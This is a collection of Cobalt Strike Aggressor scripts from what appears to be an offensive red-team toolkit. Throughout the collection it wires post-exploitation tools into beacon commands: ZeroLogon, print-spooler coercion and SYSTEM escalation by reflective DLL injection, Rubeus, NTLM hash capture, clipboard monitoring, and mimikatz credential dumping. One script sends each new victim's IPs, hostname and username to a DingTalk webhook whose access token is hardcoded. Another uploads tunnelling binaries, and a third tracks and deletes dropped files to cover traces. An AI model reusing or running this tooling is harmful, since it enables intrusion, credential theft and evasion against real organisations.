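/scripts/cmd/SharpZeroLogon_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("SharpZeroLogon", "SharpZeroLogon", 2 | "Usage: SharpZeroLogon. [arguments]\n\n" . 3 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 4 | alias sharpup{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "SharpZeroLogon"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . 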
" Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/SharpZeroLogon.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/Spool.cna: -------------------------------------------------------------------------------- 1 | import common.CommonUtils; 2 | import beacon.CommandBuilder; 3 | import common.ReflectiveDLL; 4 | 5 | sub SpoolTrigger { 6 | local('$bid $pipename $spawn $offset $padding $patched $dllbytes $file $builder $pid $pipenameW'); 7 | $bid = $1; 8 | $pipename = $2; 9 | $method = $3; 10 | 11 | if ($method eq "spawn") { 12 | # this is to avoid cross-arch injection where possible 13 | if(binfo($bid, 'barch') eq 'x64') { 14 | bdllspawn($1, script_resource("exe/SpoolTrigger.x64.dll"), $pipename, "spooltrigger", 5000, true); 15 | } 16 | else { 17 | bdllspawn($1, script_resource("exe/SpoolTrigger.x86.dll"), $pipename, "spooltrigger", 5000, true); 18 | } 19 | } 20 | else { 21 | # patch and self-inject.. 22 | # first we need to patch up our arguments 23 | # we use internal APIs since bdllinject wants a filepath not bytes 24 | if(binfo($bid, 'barch') eq 'x64') { 25 | $file = script_resource("exe/SpoolTrigger.x64.dll"); 26 | } 27 | else { 28 | $file = script_resource("exe/SpoolTrigger.x86.dll"); 29 | } 30 | 31 | $dllbytes = [CommonUtils readFile: $file]; 32 | $padding = [CommonUtils garbage: "PATCHME"]; 33 | $patched = [CommonUtils patch: $dllbytes, "PATCHME", $padding . $pipename]; 34 | $offset = [ReflectiveDLL findReflectiveLoader: $dllbytes]; 35 | 36 | if($offset <= 0) { 37 | berror($1, "Could not find ReflectiveLoader"); 38 | return; 39 | } 40 | 41 | $pid = binfo($bid, 'pid'); 42 | blog($bid, "Injecting spooltrigger into PID: " . 
$pid); 43 | $builder = [new CommandBuilder]; 44 | if ([ReflectiveDLL is64: $dllbytes]) { 45 | [$builder setCommand: 43]; 46 | } else { 47 | [$builder setCommand: 9]; 48 | } 49 | [$builder addInteger: parseNumber($pid)]; 50 | [$builder addInteger: $offset]; 51 | [$builder addString: [CommonUtils bString: $patched]]; 52 | call("beacons.task", $null, $bid, cast([$builder build], 'b')); 53 | } 54 | } 55 | 56 | sub SpoolSystem { 57 | local('$mypipe $pipename $builder') 58 | # needed for ImpersonateNamedPipeClient 59 | btask($1, "Tasked beacon to get SYSTEM via spoolss", "T1134"); 60 | bgetprivs($1, "SeImpersonatePrivilege"); 61 | 62 | # fire up a named pipe: (you probably want to rename this) 63 | $mypipe = [CommonUtils garbage: "spooltrigger"]; 64 | $pipename = "\\\\.\\pipe\\" . $mypipe . "\\pipe\\spoolss"; 65 | $builder = [new CommandBuilder]; 66 | [$builder setCommand: 60]; 67 | [$builder addString: $pipename]; 68 | call("beacons.task", $null, $1, cast([$builder build], 'b')); 69 | 70 | # trigger spoolss 71 | SpoolTrigger($1, $mypipe, $2); 72 | 73 | # impersonate the named pipe client 74 | [$builder setCommand: 61]; 75 | call("beacons.task", $null, $1, cast([$builder build], 'b')); 76 | } 77 | 78 | beacon_command_register("spoolsystem", "Gets SYSTEM via spoolss", 79 | "Uses named pipe impersonation to gain SYSTEM via Print Spooler.\n\n" . 80 | "Use: spoolsystem \n\n" . 81 | "Example: spoolsystem selfinject\n" . 
82 | "Example: spoolsystem spawn" ); 83 | 84 | alias spoolsystem { 85 | local('$args'); 86 | $args = substr($0, strlen("spoolsystem ")); 87 | 88 | if ($args eq "") { 89 | berror($1, "Please specify an execution method."); 90 | return; 91 | } 92 | SpoolSystem($1, $args); 93 | } -------------------------------------------------------------------------------- /scripts/cmd/SpoolSample.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("SpoolSample", "打印机服务漏洞利用", 2 | "Usage: SpoolSample targetip relayip \n" . 3 | "Usage: sharpmapexec -h\n\n" . 4 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 5 | 6 | alias SpoolSample{ 7 | local('$bid $asm $desc @args $argu'); 8 | $bid = $1; 9 | $desc = "SpoolSample"; 10 | @args = @_; 11 | remove(@args, $bid); 12 | $argu = join(' ', @args); 13 | if ($argu eq ""){ 14 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 15 | } 16 | else{ 17 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 18 | } 19 | bexecute_assembly!($bid, script_resource("exe/SpoolSample.exe"), $argu); 20 | } 21 | -------------------------------------------------------------------------------- /scripts/cmd/clipboard_monitor.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("clipboard_monitor", "This will monitor a victims clipboard for changes - may be useful for credentials", 2 | "Usage: clipboard_monitor \n\n" . 3 | "Monitor a victims clipboard for changes - may be useful for credentials\n"); 4 | alias clipboard_monitor{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "Clipboard Monitor"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . 
" Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/SharpClipboard.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/coffee.cna: -------------------------------------------------------------------------------- 1 | alias coffee{ 2 | # $args = substr($0, 6); 3 | bdllspawn($1, script_resource("dll/mimikatz.dll"),"privilege::debug sekurlsa::logonPasswords", "QAX", 5000, false); 4 | } -------------------------------------------------------------------------------- /scripts/cmd/cwd-in-beacon-status-bar.cna: -------------------------------------------------------------------------------- 1 | # 2 | # Simple Beacon console status bar enhancement showing Beacon's last known current 3 | # working directory path, as well as adding fixed-width to last-seen meter. 4 | # 5 | # Additionally, this script enhances 'cd' command to make it restore previous path 6 | # if "cd -" was issued (and previous path is known). 7 | # 8 | # Author: 9 | # Mariusz B. / mgeeky, '20 10 | # 11 | # (https://github.com/mgeeky) 12 | # 13 | 14 | global('%OPERATING_BEACONS'); 15 | %OPERATING_BEACONS = %(); 16 | 17 | beacon_command_register( 18 | "cd", 19 | "Change directory on host. Use '-' to get back to previous cwd.", 20 | "Use: cd [directory]\n\nChange directory on host. 
Use '-' to get back to previous cwd."); 21 | 22 | set BEACON_SBAR_LEFT { 23 | local('$hostname $username $pid $arch $pwd'); 24 | $hostname = $2["computer"]; 25 | $username = $2["user"]; 26 | $pid = $2["pid"]; 27 | $arch = $2["arch"]; 28 | $pwd = %OPERATING_BEACONS[$1]['cwd']; 29 | 30 | return "[\c2 $+ $hostname $+ \o] $username $+ / $+ $pid \cE( $+ $arch $+ )\o\c2 $pwd \o"; 31 | } 32 | 33 | set BEACON_SBAR_RIGHT { 34 | local('$note $last'); 35 | $note = $2["note"]; 36 | $last = $2["lastf"]; 37 | 38 | return "\c6 $note \cE(last: $+ $[5]last $+ )\o"; 39 | } 40 | 41 | on beacon_tasked { 42 | local('$pwd $sep'); 43 | 44 | if('cd *' iswm $2) { 45 | $pwd = substr($2, strlen("cd ")); 46 | $sep = iff(binfo($1, "os") eq "Windows", "\\", "/"); 47 | 48 | if($pwd eq "..") { 49 | $pwd = substr(%OPERATING_BEACONS[$1]['cwd'], 0, lindexOf(%OPERATING_BEACONS[$1]['cwd'], $sep)); 50 | 51 | if($pwd eq "..") { 52 | return "\cC[*]\o $2"; 53 | } 54 | } 55 | else if($pwd eq ".") { 56 | return "\cC[*]\o $2"; 57 | } 58 | else if((strlen($pwd) >= 2) && (charAt($pwd, 1) ne ":")) { 59 | # relative path? 60 | $pwd = %OPERATING_BEACONS[$1]['cwd'] . $sep . $pwd; 61 | } 62 | 63 | %OPERATING_BEACONS[$1]['prev-cwd'] = %OPERATING_BEACONS[$1]['cwd']; 64 | %OPERATING_BEACONS[$1]['cwd'] = $pwd; 65 | 66 | return "\cC[*]\o $2"; 67 | } 68 | } 69 | 70 | set BEACON_OUTPUT_ALT { 71 | local('$pwd'); 72 | 73 | if($2 ismatch 'Current directory is (.+)') { 74 | $pwd = matched()[0]; 75 | %OPERATING_BEACONS[$1]['prev-cwd'] = %OPERATING_BEACONS[$1]['cwd']; 76 | %OPERATING_BEACONS[$1]['cwd'] = $pwd; 77 | return "\cC[*]\o Current directory is \cC" . $pwd . 
"\o\n"; 78 | } 79 | 80 | return "\cC[*]\o $2\n"; 81 | } 82 | 83 | on beacon_input { 84 | if (["$3" trim] eq "ls") { 85 | %OPERATING_BEACONS[$1]['cwd-use-ls'] = 1; 86 | } 87 | } 88 | 89 | on beacon_output_ls { 90 | local('$pwd'); 91 | 92 | if(%OPERATING_BEACONS[$1]['cwd-use-ls'] == 1) { 93 | $pwd = split("\n", ["$2" trim])[0]; 94 | if(right($pwd, 2) eq "\\*") { 95 | $pwd = substr($pwd, 0, -2); 96 | } 97 | %OPERATING_BEACONS[$1]['prev-cwd'] = %OPERATING_BEACONS[$1]['cwd']; 98 | %OPERATING_BEACONS[$1]['cwd'] = $pwd; 99 | %OPERATING_BEACONS[$1]['cwd-use-ls'] = 0; 100 | } 101 | } 102 | 103 | on beacons { 104 | if(%OPERATING_BEACONS is $null) { 105 | %OPERATING_BEACONS = %(); 106 | } 107 | 108 | foreach $b ($1) { 109 | if(iff($b in keys(%OPERATING_BEACONS), "true", $null)) { 110 | %OPERATING_BEACONS[$b] = %(); 111 | } 112 | } 113 | } 114 | 115 | alias cd { 116 | if(($2 eq "-") && (strlen(%OPERATING_BEACONS[$1]['prev-cwd']) > 0)) { 117 | bcd($1, %OPERATING_BEACONS[$1]['prev-cwd']); 118 | return; 119 | } 120 | 121 | bcd($1, $2); 122 | } 123 | -------------------------------------------------------------------------------- /scripts/cmd/dazzleUP.cna: -------------------------------------------------------------------------------- 1 | alias dazzleUP { 2 | bdllspawn($1, script_resource("exe/dazzleUP_Reflective_DLL.dll"), $2, "dazzleUP", 5000, false); 3 | } 4 | -------------------------------------------------------------------------------- /scripts/cmd/dingding.cna: -------------------------------------------------------------------------------- 1 | $dt_token = "ed61be0adb7d3ad20a686e45499faa5721bd4a74f8e7ee04aefa894240643f57"; 2 | #$dt_token = "a9a4be2b08dfd85d1806d18d3cce68553953fc8473f331b187dc55f142ac0b0b"; 3 | 4 | $dt_bot_webhookURL = 'https://oapi.dingtalk.com/robot/send?access_token='.$dt_token; 5 | 6 | $targetInfo_txt = "## Wing,360送的快递到小邮局啦!\n>"; 7 | $listener_txt = "**所属项目:**"; 8 | $externalIp_txt = " \n >**公网IP:**"; 9 | $internalIp_txt = " \n >**内网IP:**"; 10 | 
$computerName_txt = " \n >**主机名:**"; 11 | $userName_txt = " \n >**当前用户:**"; 12 | 13 | 14 | on beacon_initial { 15 | local('$internalIP $computerName $userName'); 16 | $internalIP = replace(beacon_info($1, "internal"), " ", "_"); 17 | $externalIP = replace(beacon_info($1, "external"), " ", "_"); 18 | $computerName = replace(beacon_info($1, "computer"), " ", "_"); 19 | $userName = replace(beacon_info($1, "user"), " ", "_"); 20 | $listennerName = replace(beacon_info($1, "listener"), " ", "_"); 21 | $dt_msg = "{\"msgtype\": \"markdown\",\"markdown\": {\"title\":\"新主机上线\",\"text\":"."\"".$targetInfo_txt.$listener_txt.$listennerName.$externalIp_txt.$externalIP.$internalIp_txt.$internalIP.$computerName_txt.$computerName.$userName_txt.$userName."\""."}}"; 22 | @curl_command = @('curl', '-H', 'Content-Type: application/json', '-d', $dt_msg, $dt_bot_webhookURL); 23 | exec(@curl_command); 24 | bshell($1, "ipconfig /all"); 25 | } -------------------------------------------------------------------------------- /scripts/cmd/frp.cna: -------------------------------------------------------------------------------- 1 | popup beacon_bottom { 2 | menu "FrpSocks5"{ 3 | item "Upload" { 4 | local('$bid'); 5 | foreach $bid ($1){ 6 | upload($bid); 7 | } 8 | } 9 | 10 | item "Run"{ 11 | $bid = $1; 12 | show_message("传哪里自己手动执行 :XD"); 13 | # $dialog = dialog("Run frpc", %(uri => "http://x.x.x.x/frpc.ini or c:\\frpc.ini", bid => $bid), &run); 14 | # drow_text($dialog, "uri", "configURI: "); 15 | # dbutton_action($dialog, "ok"); 16 | # dialog_show($dialog); 17 | } 18 | 19 | 20 | } 21 | } 22 | 23 | sub upload{ 24 | local('$dialog %defaults $bid'); 25 | $bid = $1; 26 | # $ptype = "elevatedregistrykey"; 27 | 28 | %defaults["localpath"] = "/tmp/c"; 29 | %defaults["localconfigpath"] = "/tmp/c.ini"; 30 | %defaults["remotepath"] = "/tmp/c"; 31 | %defaults["remoteconfigpath"] = "/tmp/c.ini"; 32 | # %defaults["droplocation"] = %persistdefaults["droplocation"]; 33 | # %defaults["customfile"] = 
%persistdefaults["customfile"]; 34 | # %defaults["listener"] = %persistdefaults["listener"]; 35 | # %defaults["template"] = %persistdefaults["template"]; 36 | 37 | $dialog = dialog("FRP Upload", %defaults, lambda({ 38 | # bexecute_assembly($bid,script_resource("/exe/Xshell.exe")," -Xshell ".$3["path"]." ".$3["uid"]) 39 | # }, \$bid, \$3) 40 | bupload($bid,$3["localpath"]); 41 | bupload($bid,$3["localconfigpath"]); 42 | bmv($bid, $3["remotepath"], $3["remotepath"]) 43 | bmv($bid, $3["localconfigpath"], $3["remoteconfigpath"]) 44 | },\$bid, \$3) 45 | ); 46 | dialog_description($dialog, "请输入路径"); 47 | drow_text($dialog, "localpath", "本地路径"); 48 | drow_text($dialog, "localconfigpath", "本地配置"); 49 | drow_text($dialog, "remotepath", "远程路径"); 50 | drow_text($dialog, "remoteconfigpath", "远程配置"); 51 | dbutton_action($dialog, "Execute"); 52 | dialog_show($dialog); 53 | } 54 | 55 | popup ssh { 56 | menu "Frp"{ 57 | item "Upload" { 58 | local('$bid'); 59 | foreach $bid ($1){ 60 | upload($bid); 61 | } 62 | } 63 | 64 | 65 | item "Run"{ 66 | $bid = $1; 67 | show_message("传哪里自己手动执行 :XD"); 68 | # $dialog = dialog("Run frpc", %(uri => "http://x.x.x.x/frpc.ini or c:\\frpc.ini", bid => $bid), &run); 69 | # drow_text($dialog, "uri", "configURI: "); 70 | # dbutton_action($dialog, "ok"); 71 | # dialog_show($dialog); 72 | } 73 | 74 | 75 | } 76 | } 77 | 78 | sub upload{ 79 | local('$dialog %defaults $bid'); 80 | $bid = $1; 81 | # $ptype = "elevatedregistrykey"; 82 | 83 | %defaults["localpath"] = "/tmp/c"; 84 | %defaults["localconfigpath"] = "/tmp/c.ini"; 85 | %defaults["remotepath"] = "/tmp/c"; 86 | %defaults["remoteconfigpath"] = "/tmp/c.ini"; 87 | # %defaults["droplocation"] = %persistdefaults["droplocation"]; 88 | # %defaults["customfile"] = %persistdefaults["customfile"]; 89 | # %defaults["listener"] = %persistdefaults["listener"]; 90 | # %defaults["template"] = %persistdefaults["template"]; 91 | 92 | $dialog = dialog("FRP Upload", %defaults, lambda({ 93 | # 
bexecute_assembly($bid,script_resource("/exe/Xshell.exe")," -Xshell ".$3["path"]." ".$3["uid"]) 94 | # }, \$bid, \$3) 95 | bupload($bid,$3["localpath"]); 96 | bupload($bid,$3["localconfigpath"]); 97 | bmv($bid, $3["remotepath"], $3["remotepath"]) 98 | bmv($bid, $3["localconfigpath"], $3["remoteconfigpath"]) 99 | },\$bid, \$3) 100 | ); 101 | dialog_description($dialog, "请输入路径"); 102 | dialog_description($dialog, "请输入路径"); 103 | drow_text($dialog, "localpath", "本地FRP路径"); 104 | drow_text($dialog, "localconfigpath", "本地ini路径"); 105 | drow_text($dialog, "remotepath", "远程FRP路径"); 106 | drow_text($dialog, "remoteconfigpath", "远程ini路径"); 107 | dbutton_action($dialog, "Execute"); 108 | dialog_show($dialog); 109 | } -------------------------------------------------------------------------------- /scripts/cmd/internal-monologue_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("internal_monologue", "调用本地包进行NTLM认证,抓取hash", 2 | "Usage: internal_monologue \n\n" . 3 | "Uses execute-assembly to run the assembly. No arguments needed \n"); 4 | alias internal_monologue{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "InternalMonologue"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/InternalMonologue.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/leave_no_trace.cna: -------------------------------------------------------------------------------- 1 | #### LeaveNoTrace #### 2 | ## Keep track of dropped files to clean up environment later. 3 | ## Author: Alyssa (ramen0x3f) 4 | ## Last Updated: 2018-09-26 5 | 6 | ## Usage: ## 7 | # View > "Leave No Trace". 
Click column to sort. 8 | # (By default all items show as Status: ?. Click "Check for litter" to update.) 9 | # 10 | # Right click items 11 | # > "Search and Destroy" tries to remove items from the chosen beacon 12 | # > "Check for litter" 13 | # - Does an LS to look for the dest_file from the chosen beacon 14 | # - Updates left column of results with status (cleaned, NOT cleaned, ?) 15 | 16 | ## Coming soon: ## 17 | # - Additional options to specify directories/paths (in cases dest_file was the filename only) 18 | # - Track bcp() calls in archives too instead of just bupload() 19 | # - Add interesting filenames/directories to compromised_log.rpt for easier reporting to blue team 20 | 21 | ## FAIR WARNING ## 22 | # If you select a dest_file that has only the filename (not a full path as well) this will fail. 23 | # I'm sorry - it's not my fault. It's all I could pull from the archives/upload event. 24 | 25 | ## CREDIT ## 26 | # This script uses the awesome visualization/tab code by @001SPARTaN (for @r3dqu1nn) 27 | # As seen on tv: https://github.com/harleyQu1nn/AggressorScripts/blob/master/logvis.cna 28 | 29 | ################################################################################# 30 | ## Imports ## 31 | ############# 32 | import ui.*; 33 | import table.*; 34 | import java.awt.*; 35 | import javax.swing.*; 36 | import javax.swing.table.*; 37 | 38 | global('$model $console $table %looking @directories @filenames @targets'); 39 | 40 | ################################################################################# 41 | ## Functions ## 42 | ############### 43 | sub check_for_litter { 44 | ## Callback for "Check for litter" right click menu option 45 | ## Does an LS on each dest directory from the specified beacon id 46 | 47 | #Set variables 48 | local('$bid $host $dir $d $dir %files %details'); 49 | $bid = $3['bid']; 50 | 51 | foreach $host => %files (%looking) { #Get each host we're looking for 52 | foreach $dir => %details (%files) { #Check each 
directory/item under the host 53 | if ( %details['update'] ) { #See if we're looking for it right now 54 | $d = strrep(join("\\", sublist(split("\\\\", $dir), 0, -1)), ':', '$'); #Parse directory 55 | println("Looking in $d on $host from $bid"); 56 | bls($bid, "\\\\" . $host . "\\" . $d, &search_callback); 57 | } 58 | } 59 | } 60 | } 61 | 62 | sub create_vis { 63 | ## This is the fancy code from @001SPARTaN and @r3dqu1nn 64 | 65 | this('$client'); 66 | local('$sorter $content'); 67 | # GenericTableModel from table.* 68 | # Columns for each data model 69 | 70 | #####Taking our source_file for now 71 | #$model = [new GenericTableModel: @(beacon_pid", "beacon_ip", "beacon_user", "source_file", "dest_file"), "beacon", 16]; 72 | 73 | $model = [new GenericTableModel: @("status", "beacon_id", "beacon_ip", "beacon_user", "dest_file"), "beacon", 16]; 74 | 75 | # Create a table from the GenericTableModel 76 | $table = [new ATable: $model]; 77 | 78 | # Controls how the column headers will sort the table 79 | $sorter = [new TableRowSorter: $model]; 80 | [$sorter toggleSortOrder: 3]; 81 | 82 | [$sorter setComparator: 0, { 83 | return $1 cmp $2; 84 | }]; 85 | 86 | [$sorter setComparator: 1, { 87 | return $1 cmp $2; 88 | }]; 89 | 90 | [$sorter setComparator: 2, { 91 | return $1 cmp $2; 92 | }]; 93 | 94 | [$sorter setComparator: 3, { 95 | return $1 <=> $2; 96 | }]; 97 | 98 | # Set $sorter as the row sorter for $table 99 | [$table setRowSorter: $sorter]; 100 | 101 | # Create a split pane (divider you can drag around) 102 | $content = [new JScrollPane: $table]; 103 | 104 | # Set popup menu for the table 105 | setup_popup($table, "menu"); 106 | 107 | update_table(); 108 | 109 | # Register the visualization with CS 110 | addVisualization("Leave No Trace", $content); 111 | return $content; 112 | } 113 | 114 | sub destroy_callback { 115 | ## Callback for the LS from the "Search and Destroy" command 116 | ## Parses directory listing and removes designated files 117 | ## Note: I wrote 
this first so it's probably not the best it could be. 118 | 119 | local('$host $temp'); 120 | @results = split("\n", $3); 121 | removeAt(@results, 0); 122 | $host = split('\\\\', $2)[2]; 123 | 124 | if ( size(@results) ) { 125 | foreach %r (@results) { 126 | @x = split("\t", %r); 127 | if ( @x[0] !ismatch 'D' && @x[-1] in @filenames ) { #Check if file matches interesting ones 128 | $temp = $dir . "\\" . @x[-1]; 129 | 130 | blog($1, ">> FOUND: " . $2 . "\\" . @x[-1]); 131 | println(">> REMOVING: " . $2 . "\\" . @x[-1]); 132 | brm($1, $2 . "\\" . @x[-1]); #Destroy 133 | 134 | %looking[$host][$temp]['status'] = 'NOT cleaned'; #Update for the Leave No Trace tab 135 | %looking[$host][$temp]['update'] = 0; 136 | update_table(); 137 | } 138 | } 139 | } 140 | return; 141 | } 142 | 143 | sub search_and_destroy { 144 | ## Callback for "Search and Destroy" right click menu option 145 | ## Does an LS on each dest directory from the specified beacon id and removes interesting files 146 | 147 | $bid = $3['bid']; 148 | foreach $d (@directories) { #Change to UNC path for bls() 149 | $d = strrep($d, ':', '$'); 150 | } 151 | 152 | foreach $tar (@targets) { 153 | foreach $dir (@directories) { 154 | blog($bid, "Searching \\\\" . $tar . "\\" . $dir); 155 | bls($bid, "\\\\" . $tar . "\\" . 
$dir, &destroy_callback);
}
}
}

sub search_archives {
## Parses archives to pull out uploads for the Leave No Trace tab
## Returns all the items to add to the model
## Each returned %entry carries beacon_pid, source_file, dest_file, beacon_user,
## beacon_ip, beacon_id and status ("?" unless %looking already holds a status
## for that host/path). Archives whose beacon is no longer in beacon_ids() are skipped.
## NOTE(review): $source is not declared in local() below, so it is not scoped to
## this sub; add it to the local() list.

local('$ip $dir $dest $status @uploads @bids %entry $parse $bid');
@uploads = @();
@bids = beacon_ids();

foreach %entry (data_query("archives")) {
#Pull out interesting archives
if( %entry['data'] ismatch 'upload .* as .*') {
$parse = replace(%entry['data'], 'upload ', '');
# NOTE(review): split on ' as ' — a path that itself contains " as " would presumably
# be split in the wrong place; verify against real archive entries.
($source, $dest) = split(' as ', $parse);

$bid = %entry['bid'];
if ( $bid !in @bids ) {
continue;
}

#Get IP and directory
if ( $dest !hasmatch '^\\\\' ) {
$ip = beacon_info($bid, "internal");
$dir = $dest;
}
#If UNC path in dest_file, parse out IP
else {
$ip = split('\\\\', $dest)[2];
$dir = join('\\', sublist(split('\\\\', $dest), 3));
}

#Set status if we've already checked its status
if ( $ip in %looking && $dir in %looking[$ip] ) {
$status = %looking[$ip][$dir]['status'];
}
else {
$status = "?";
}

#Add to array
add(@uploads, %(beacon_pid => beacon_info($bid, "pid"), source_file => $source, dest_file => $dest, beacon_user => beacon_info($bid, "user"), beacon_ip => $ip, beacon_id => $bid, status => $status));
}
}

return @uploads;
}

## Callback for the LS issued by check_for_litter
## $2 is the UNC path that was listed, $3 the raw listing. $host is taken from the
## UNC server component and $dir from the remainder of the path. The first line of
## the listing is dropped; the remaining lines are tab-separated, with the first
## column flagging directories ('D') and the last column holding the name.
sub search_callback {
local('$host @results $dir %r @x $item %details');
@results = split("\n", $3);
removeAt(@results, 0);
$host = split('\\\\', $2)[2];
$dir = join('\\', sublist(split('\\\\', $2), 3));

if ( size(@results) ) {
foreach %r (@results) {
@x = split("\t", %r);
if ( @x[0] !ismatch 'D' ) {
# NOTE(review): $temp is not in the local() list above, so it is not scoped to this sub
$temp = $dir . "\\" . 
@x[-1]; 218 | if ( $temp in %looking[$host] && %looking[$host][$temp]['update'] == 1 ) { 219 | println("Found $temp on $host"); 220 | %looking[$host][$temp]['status'] = 'NOT cleaned'; 221 | %looking[$host][$temp]['update'] = 0; 222 | update_table(); 223 | return; 224 | } 225 | } 226 | } 227 | println("Didn't find anything"); 228 | foreach $item => %details (%looking[$host]) { 229 | if ( %details['update'] && $dir isin $item ) { 230 | println("Marking $item as cleaned on $host"); 231 | %details['status'] = 'cleaned'; 232 | %details['update'] = 0; 233 | } 234 | } 235 | } 236 | println("Updating table"); 237 | update_table(); 238 | return; 239 | } 240 | 241 | sub setup_popup { 242 | # setup_popup provided by Raphael Mudge 243 | # https://gist.github.com/rsmudge/87ce80cd8d8d185c5870d559af2dc0c2 244 | # we're using fork({}) to run this in a separate Aggressor Script environment. 245 | # This reduces deadlock potential due to Sleep's global interpreter lock 246 | # 247 | # this especially matters as our mouse listener will be fired for *everything* 248 | # to include mouse movements. 249 | fork({ 250 | [$component addMouseListener: lambda({ 251 | if ([$1 isPopupTrigger]) { 252 | # If right click, show popup 253 | show_popup($1, $name, $component); 254 | } 255 | }, \$component, \$name)]; 256 | }, $component => $1, $name => $2, $model => $model, $table => $table); 257 | } 258 | 259 | sub update_table { 260 | ## Updates the Leave No Trace tab 261 | ## As a note: when you fork() you have to pass all global 262 | ## variables (see \$model and \%looking) or you'll go insane. 263 | 264 | fork({ 265 | local('%entry'); 266 | 267 | # Clear the model so we can put new stuff in it. 
268 | [$model clear: 1024]; 269 | 270 | foreach %entry (search_archives()) { 271 | # Add the new entry to $model 272 | [$model addEntry: %entry]; 273 | } 274 | # Update with the new table 275 | [$model fireListeners]; 276 | }, \$model, \%looking); 277 | } 278 | 279 | ################################################################################# 280 | ## Pop Ups ## 281 | ############# 282 | popup menu { 283 | item "Search and Destroy" { 284 | local('$dir $dest $file $ip'); 285 | 286 | #Get ready 287 | clear(@filenames); 288 | clear(@targets); 289 | clear(@directories); 290 | 291 | #A little inner dialog 292 | $dialog = dialog("Search and Destroy", %(bid => $null), &search_and_destroy); 293 | dialog_description($dialog, "FAIR WARNING: if you select a dest_file that has only the filename (not a full path as well) this will fail. I'm sorry - it's not my fault. It's all I could pull from the archives/upload event."); 294 | drow_beacon($dialog, "bid", "Beacon to search from: "); 295 | dbutton_action($dialog, "Destroy"); 296 | dialog_show($dialog); 297 | 298 | #Make a list 299 | foreach $row ([$table getSelectedRows]) { 300 | $dest = [$model getValueAt: $row, 4]; 301 | $file = split('\\\\', $dest)[-1]; 302 | add(@filenames, $file); 303 | 304 | #Check it twice 305 | if ( $dest !hasmatch '^\\\\' ) { 306 | add(@targets, [$model getValueAt: $row, 2]); #IP 307 | $dir = join('\\', sublist(split('\\\\', $dest), 0, -1)); 308 | add(@directories, $dir); 309 | } 310 | else { 311 | add(@targets, split('\\\\', $dest)[2]); #IP 312 | $dir = join('\\', sublist(split('\\\\', $dest), 3, -1)); 313 | add(@directories, $dir); 314 | } 315 | } 316 | } 317 | 318 | item "Check for litter" { 319 | local('$dir $dest $ip $host $row $dialog %folders'); 320 | foreach $host => %folders (%looking) { 321 | foreach $dir => %details (%folders) { 322 | %details['update'] = 0; 323 | } 324 | } 325 | 326 | #Make a list 327 | foreach $row ([$table getSelectedRows]) { 328 | $dest = [$model getValueAt: $row, 
4]; 329 | 330 | #Check it twice 331 | if ( $dest !hasmatch '^\\\\' ) { 332 | $ip = [$model getValueAt: $row, 2]; 333 | $dir = $dest; 334 | } 335 | else { 336 | $ip = split('\\\\', $dest)[2]; 337 | $dir = join('\\', sublist(split('\\\\', $dest), 3)); 338 | } 339 | 340 | if ( $ip in %looking && $dir in %looking[$ip] ) { 341 | %looking[$ip][$dir]['update'] = 1; 342 | } 343 | else { 344 | %looking[$ip][$dir] = %(status => '?', update => 1); 345 | } 346 | } 347 | 348 | #A little inner dialog 349 | $dialog = dialog("Check for litter", %(bid => $null), &check_for_litter); 350 | dialog_description($dialog, "FAIR WARNING: if you select a dest_file that has only the filename (not a full path as well) this will fail. I'm sorry - it's not my fault. It's all I could pull from the archives/upload event."); 351 | drow_beacon($dialog, "bid", "Beacon to search from: "); 352 | dbutton_action($dialog, "Check"); 353 | dialog_show($dialog); 354 | } 355 | } 356 | 357 | popup view { 358 | item "文件上传历史记录" { 359 | # Show the visualization 360 | addTab("Leave No Trace", create_vis(), "All uploaded/dropped files"); 361 | } 362 | } 363 | -------------------------------------------------------------------------------- /scripts/cmd/rubeus_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("rubeus", "Executes Rubeus assembly", 2 | "Usage: rubeus [arguments]\n\n" . 3 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 4 | alias rubeus{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "Rubeus"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . 
